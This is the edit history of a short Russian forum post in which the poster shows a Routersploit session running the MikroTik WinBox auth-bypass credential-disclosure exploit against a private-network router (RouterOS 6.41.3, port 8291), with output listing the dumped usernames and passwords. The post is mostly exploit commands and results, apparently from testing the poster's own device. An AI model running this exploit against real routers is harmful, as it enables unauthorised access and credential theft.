История изменений
Исправление
log4tmp,
(текущая версия)
:
Попробовал Routersploit:
rsf > use exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure
rsf (Mikrotik WinBox Auth Bypass - Creds Disclosure) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target IPv4 or IPv6 address
port 8291 Target WinBox service
Module options:
Name Current settings Description
---- ---------------- -----------
verbosity true Enable verbose output: true/false
rsf (Mikrotik WinBox Auth Bypass - Creds Disclosure) > set target 192.168.10.100
[+] target => 192.168.10.100
rsf (Mikrotik WinBox Auth Bypass - Creds Disclosure) > run
[*] Running module...
[*] Connection established
[+] Target seems to be vulnerable
[*] Dumping credentials
Username Password
-------- --------
test Ghngt56s+
admin
admin test123
на микроте(6.41.3) открыт только 8291
Исходная версия Deleted, :
Попробовал Routersploit:
rsf > use exploits/routers/mikrotik/winbox_auth_bypass_creds_disclosure
rsf (Mikrotik WinBox Auth Bypass - Creds Disclosure) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target IPv4 or IPv6 address
port 8291 Target WinBox service
Module options:
Name Current settings Description
---- ---------------- -----------
verbosity true Enable verbose output: true/false
rsf (Mikrotik WinBox Auth Bypass - Creds Disclosure) > set target 192.168.10.100
[+] target => 192.168.10.100
rsf (Mikrotik WinBox Auth Bypass - Creds Disclosure) > run
[*] Running module...
[*] Connection established
[+] Target seems to be vulnerable
[*] Dumping credentials
Username Password
-------- --------
test Ghngt56s+
admin
admin test123
на микроте открыт только 8291